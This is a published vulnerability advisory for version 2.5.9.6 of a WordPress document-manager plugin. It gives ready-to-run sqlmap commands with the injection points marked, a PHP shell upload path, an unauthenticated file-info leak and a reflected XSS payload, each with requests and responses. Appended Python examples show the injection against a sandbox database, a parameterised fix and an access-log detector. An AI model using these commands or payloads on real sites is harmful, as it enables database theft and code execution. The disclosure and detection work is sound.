WordPress SP Projects And Document Manager 2.5.9.6 XSS / SQL Injection

Published: 07 Mar 2016 | Reported by: Michael Helwig | Type: packetstorm | Source: packetstormsecurity.com

WordPress SP Projects And Document Manager 2.5.9.6 multiple vulnerabilities: arbitrary file upload, SQL injection, information leakage, XSS

Code
`* Exploit Title: Multiple Vulnerabilities in SP Projects & Document Manager  
* Discovery Date: 2016/01/13  
* Public Disclosure Date: 2016/03/06  
* Exploit Author: Michael Helwig  
* Contact: https://twitter.com/c0dmtr1x  
* Vendor Homepage: http://smartypantsplugins.com/  
* Software Link: https://de.wordpress.org/plugins/sp-client-document-manager/  
* Version: 2.5.9.6  
* Tested on: WordPress 4.4.1  
* Category: webapps  
  
Description  
===============================================================================  
  
The WordPress plugin "SP Projects & Document Manager" contains several  
vulnerabilities: arbitrary file upload leading to code execution by registered  
users, and SQL injection, information leakage and XSS reachable by unregistered users.  
  
PoC  
===============================================================================  
  
  
1. SQL-Injections  
~~~~~~~~~~~~~~~~~~~  
  
Several SQL injections were known in version 2.4.1 and were fixed in later releases.  
At least two of them reappeared in version 2.5.9.6:  
  
- the injection in the id parameter of  
http://wordpress.local.de/wp-content/plugins/sp-client-document-manager/admin/  
ajax.php?function=download-project&id=1  
  
- and the POST parameter vendor_email[] on  
http://wordpress.local.de/wp-content/plugins/sp-client-document-manager/admin/  
ajax.php?function=email-vendor  
  
See https://packetstormsecurity.com/files/129212/\  
WordPress-SP-Client-Document-Manager-2.4.1-SQL-Injection.html   
for the original information on this.  
  
Both injections can be exploited with sqlmap; the asterisk (*) in each command marks the custom injection point sqlmap should test:  
  
[1] sqlmap -u "http://wordpress.local.de/wp-content/plugins/sp-client-document\  
-manager/admin/ajax.php?function=download-project&id=1*" -p id --dbms mysql  
  
[2] sqlmap -u "http://wordpress.local.de/wp-content/plugins/sp-client-document\  
-manager/admin/ajax.php?function=email-vendor" --data="vendor_email[]=0) \  
OR (1=1 *" --dbms mysql  
  
  
  
2. Arbitrary code execution  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Clients (registered users) can upload PHP files (*.php, *.php5 etc.) and execute  
them via a GET request to their location under the upload path (which can vary  
depending on the configuration of the plugin). The URL of an uploaded file  
typically looks like  
  
/wp-content/uploads/sp-client-document-manager/[UPLOADER-ID]/[FILE]  
  
e.g.  
http://wordpress.local.de/wp-content/uploads/sp-client-document-manager\  
/1/shell.php  
  
Files can be accessed directly even when the option "Require Login to Download"  
is checked in the plugin configuration; the option does not protect the upload directory itself.  
  
  
3. Information leakage  
~~~~~~~~~~~~~~~~~~~~~~~  
  
Information about uploaded files can be retrieved by unauthenticated users via a  
call to admin/ajax.php:  
  
-----------------------  
GET http://wordpress.local.de/wp-content/plugins/sp-client-document-manager\  
/admin/ajax.php?function=get-file-info&id=1  
  
-- response --  
200 OK  
Date: Wed, 13 Jan 2016 22:17:46 GMT  
Server: Apache/2.4.7 (Ubuntu)  
X-Powered-By: PHP/5.5.9-1ubuntu4.14  
Expires: Mon, 26 Jul 1997 05:00:00 GMT  
Cache-Control: no-cache, must-revalidate  
Pragma: no-cache  
Content-Length: 211  
Connection: close  
Content-Type: application/json  
  
{"id":"1","name":"in.php","file":"index.php","notes":"","tags":"","uid":"1",\  
"cid":"0","pid":"0","parent":"0","date":"2016-01-13 15:18:27","status":"0",\  
"form_id":"0","entry_id":"0","group_id":"0","client_id":"0"}  
---------------  
  
Specifically, the response reveals the uploader's user id ("uid") and the stored  
filename ("file"), which is all that is needed to build the URL for direct access  
to the file (see 2).  
  
4. XSS Vulnerability  
~~~~~~~~~~~~~~~~~~~~~~~  
  
There is a reflected (non-persistent) XSS vulnerability in admin/ajax.php for  
function=email-vendor: the vendor parameter is echoed unescaped into the  
confirmation message ("Dateien gesendet an" is German for "Files sent to"):  
  
---------------  
POST http://wordpress.local.de/wp-content/plugins/sp-client-document-manager\  
/admin/ajax.php?function=email-vendor  
Content-Type: application/x-www-form-urlencoded  
vendor_email[]=1&vendor=<script>alert(1);</script>  
  
-- response --  
200 OK  
Date: Sun, 06 Mar 2016 10:00:30 GMT  
Server: Apache/2.4.7 (Ubuntu)  
X-Powered-By: PHP/5.5.9-1ubuntu4.14  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0  
Pragma: no-cache  
Vary: Accept-Encoding  
Content-Encoding: gzip  
Content-Length: 101  
Keep-Alive: timeout=5, max=100  
Connection: Keep-Alive  
Content-Type: text/html  
  
<p style="color:green;font-weight:bold">Dateien gesendet an <script>alert(1);\  
</script></p>  
---------------  
  
  
Timeline  
===============================================================================  
  
2016/01/13 - Issues discovered  
2016/01/14 - Issues reported to vendor via contact form on his website  
2016/01/27 - No response from vendor; WordPress security team notified  
2016/01/29 - Reply from Wordpress security team  
2016/03/02 - Vendor released security update 2.6.0.0 - issues fixed  
  
  
Solution  
===============================================================================  
  
Update to version 2.6.0.0 or later (the vendor released 2.6.0.0 on 2016/03/02).  
`
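Added example, not part of the advisory and not the plugin's code: it shows why the vendor_email[] payload "0) OR (1=1" works, the boolean difference sqlmap keys on, and the bind-by-placeholder fix (which applies equally to the numeric id parameter of download-project). The query shape below, an IN (...) list built from the array parameter, is inferred from the sqlmap payload and is an assumption about the plugin; sqlite3 stands in for MySQL and the vendor rows are constructed.

```python
import sqlite3

# Constructed sample data; sqlite3 stands in for the MySQL behind WordPress.
VENDORS = [(1, "alice@example.com"), (2, "bob@example.com"), (3, "carol@example.com")]


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE vendors (id INTEGER PRIMARY KEY, email TEXT)")
    conn.executemany("INSERT INTO vendors (id, email) VALUES (?, ?)", VENDORS)
    return conn


def vendors_vulnerable(conn, vendor_email):
    """ASSUMED vulnerable shape (not the plugin's real query): the vendor_email[]
    values are joined straight into an IN (...) list.  A value such as
    0) OR (1=1  closes the list and appends its own condition, which is what
    the sqlmap payload in the advisory does."""
    in_list = ",".join(vendor_email)
    sql = "SELECT email FROM vendors WHERE id IN (%s) ORDER BY id" % in_list
    return [row[0] for row in conn.execute(sql)]


def vendors_fixed(conn, vendor_email):
    """Hardened form: validate every element as an integer and bind each one
    through a placeholder (the same idea as $wpdb->prepare() with one %d per
    element in WordPress).  Nothing from the request becomes SQL text."""
    ids = []
    for value in vendor_email:
        if not str(value).isdigit():
            raise ValueError("rejected non-numeric id: %r" % (value,))
        ids.append(int(value))
    if not ids:
        return []
    placeholders = ",".join("?" * len(ids))
    sql = "SELECT email FROM vendors WHERE id IN (%s) ORDER BY id" % placeholders
    return [row[0] for row in conn.execute(sql, ids)]


def boolean_oracle(conn):
    """The difference sqlmap keys on: a TRUE condition returns every row, a
    FALSE one returns nothing, so data can be extracted one comparison at a time."""
    true_rows = vendors_vulnerable(conn, ["0) OR (1=1"])
    false_rows = vendors_vulnerable(conn, ["0) OR (1=2"])
    return len(true_rows), len(false_rows)


if __name__ == "__main__":
    db = build_db()
    print("legitimate:", vendors_vulnerable(db, ["1", "2"]))
    print("oracle (true, false):", boolean_oracle(db))
    print("fixed:", vendors_fixed(db, ["1", "2"]))
    try:
        vendors_fixed(db, ["0) OR (1=1"])
    except ValueError as exc:
        print("fixed rejects payload:", exc)
```

The oracle function returns (3, 0): the TRUE payload lists every vendor, the FALSE one none, which is the signal sqlmap's boolean-based blind technique turns into full data extraction. The fixed variant never lets the request text reach the parser, so the same payload is rejected before any query runs.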

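A second added example, not from the advisory: detection logic for the four issues above, run over constructed Apache combined-format access-log lines. It uses the ajax.php path and the default upload path as given on the page; the log lines, timestamps and IP addresses are made up for the demonstration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Plugin paths as given in the advisory (default upload location assumed).
PLUGIN_AJAX = "/wp-content/plugins/sp-client-document-manager/admin/ajax.php"
UPLOAD_DIR = "/wp-content/uploads/sp-client-document-manager/"

# Apache "combined" log format; only the fields the checks need are named.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# Server-side extensions the advisory lists as uploadable (".php, .php5 etc.").
PHP_EXT = re.compile(r"\.ph(?:p\d?|tml|t)$", re.I)


def classify(line):
    """Map one access-log line to (tag, detail), or None if it matches none of
    the advisory's four issues."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    path, query = parts.path, parse_qs(parts.query)

    # 2. Arbitrary code execution: a PHP file served from the upload tree.
    if path.startswith(UPLOAD_DIR) and PHP_EXT.search(path):
        return ("upload_php_exec", path)

    if path == PLUGIN_AJAX:
        func = query.get("function", [""])[0]
        raw_id = query.get("id", [""])[0]
        # 1. SQL injection: download-project with anything but a plain integer id.
        if func == "download-project" and raw_id and not raw_id.isdigit():
            return ("sqli_download_project", raw_id)
        # 3. Information leakage: get-file-info needs no login at all.
        if func == "get-file-info":
            return ("file_info_leak", raw_id)
        # 1./4. email-vendor: the SQLi and XSS live in the POST body, which the
        # access log does not record, so every call is surfaced for follow-up.
        if func == "email-vendor" and m.group("method") == "POST":
            return ("email_vendor_post", m.group("ip"))
    return None


def scan(lines):
    """Return [(ip, tag, detail)] for every suspicious line, in log order."""
    hits = []
    for line in lines:
        result = classify(line)
        if result:
            hits.append((LOG_RE.match(line).group("ip"),) + result)
    return hits


# Constructed sample traffic: one attacker (203.0.113.7) walking through the
# advisory, one legitimate client (198.51.100.4).
SAMPLE_LOG = [
    '203.0.113.7 - - [13/Jan/2016:22:17:46 +0000] "GET /wp-content/plugins/sp-client-document-manager/admin/ajax.php?function=get-file-info&id=1 HTTP/1.1" 200 211 "-" "curl/7.35.0"',
    '203.0.113.7 - - [13/Jan/2016:22:18:02 +0000] "GET /wp-content/uploads/sp-client-document-manager/1/shell.php HTTP/1.1" 200 57 "-" "curl/7.35.0"',
    '203.0.113.7 - - [13/Jan/2016:22:19:10 +0000] "GET /wp-content/plugins/sp-client-document-manager/admin/ajax.php?function=download-project&id=1%20AND%201%3D1 HTTP/1.1" 200 0 "-" "sqlmap/1.0"',
    '203.0.113.7 - - [13/Jan/2016:22:20:00 +0000] "POST /wp-content/plugins/sp-client-document-manager/admin/ajax.php?function=email-vendor HTTP/1.1" 200 101 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [13/Jan/2016:22:21:00 +0000] "GET /wp-content/plugins/sp-client-document-manager/admin/ajax.php?function=download-project&id=7 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [13/Jan/2016:22:22:00 +0000] "GET /wp-content/uploads/sp-client-document-manager/2/report.pdf HTTP/1.1" 200 88210 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Only the access log is consulted here, so the email-vendor rule can do no better than flag every POST to that function; confirming the SQL injection or the reflected script needs the request body from a WAF, reverse proxy or PHP-level audit log. A legitimate download with a numeric id and a non-PHP file under the upload directory produce no hit.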